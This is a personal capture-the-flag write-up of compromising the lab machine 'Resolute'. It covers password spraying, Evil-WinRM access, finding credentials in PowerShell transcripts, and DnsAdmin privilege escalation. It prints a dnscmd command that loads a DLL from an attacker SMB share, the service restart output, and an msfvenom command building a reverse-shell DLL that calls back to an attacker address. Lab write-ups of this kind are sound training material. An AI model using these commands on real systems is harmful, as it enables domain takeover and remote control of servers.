#dnscmd

So I finally rooted Resolute... Quite ashamed at myself though: I really don’t think I’d have taken so long on it if I knew Windows better... xD

Long story short: I completely misunderstood the output of the whoami /groups command: I thought it showed possible user groups but it instead showed the groups of the logged in user (fml one million times over...)

RIGHT THERE... IT LITERALLY TELLS YOU THAT RYAN IS A DNSADMIN... JDKWFJFIF. X’D

Anyways, with self loathing ever so present, I’ll now walkthrough Resolute.

A run through of my enum script shows the presence of default password Welcome123! (enum4linux) for user Marko. While this password doesn’t work for Marko, it does turn out to be the correct pass for user Melanie- simple password spraying attack, the same concept as it would be with a variety of services. :)

After establishing a connection through Evil-WinRM, we can see that the only other users with their own directories are ryan, Administrator and Melanie (along with the defaults like Public etc.)

Logically, our goal is going to be Ryan first. It actually took me a while to find Ryan’s password in C:\PSTranscripts... Didn’t do well with Resolute at all, perhaps because it was one of my first Windows machines? :’)

Once you have access as Ryan, simple enumeration actually reveals that you’re a DnsAdmin and that the DNS process is running... If I’d known about being DnsAdmin I don’t think this machine would have taken me long at all. -.-

Upon this discovery, you can simply perform DLL Injection on the DNS process (https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2 describes this process well)

*Evil-WinRM* PS C:\Users\ryan> dnscmd RESOLUTE /config /serverlevelplugindll "\\10.10.X.X\hehe\r.dll"

Registry property serverlevelplugindll successfully reset. Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan> sc.exe stop dns

SERVICE_NAME: dns        TYPE               : 10  WIN32_OWN_PROCESS        STATE              : 3  STOP_PENDING                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)        WIN32_EXIT_CODE    : 0  (0x0)        SERVICE_EXIT_CODE  : 0  (0x0)        CHECKPOINT         : 0x0        WAIT_HINT          : 0x0 *Evil-WinRM* PS C:\Users\ryan> sc.exe stop dns [SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\ryan> sc.exe start dns

SERVICE_NAME: dns        TYPE               : 10  WIN32_OWN_PROCESS        STATE              : 2  START_PENDING                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)        WIN32_EXIT_CODE    : 0  (0x0)        SERVICE_EXIT_CODE  : 0  (0x0)        CHECKPOINT         : 0x0        WAIT_HINT          : 0x7d0        PID                : 2224        FLAGS 

I generated the DLL with msfvenom (msfvenom -p windows/x64/shell_reverse_tcp LPORT=6969 LHOST=10.10.X.X -f dll > r.dll) and started an SMB server using Impacket’s smbserver.py.

This was eye opening tbh: I feel it was such a simple machine but I royally screwed up at a couple of points- like I mentioned, my misunderstanding of whoami /groups led me to falling down a rabbit hole for weeks, thus why I took a mini break and did a couple of other machines in the meantime.

I was back on track after execution of windows-privesc-check.exe by PentestMonkey (https://github.com/pentestmonkey/windows-privesc-check): it gave me the idea of DLL hijacking via the possibility of applications loading required DLLs from your pwd.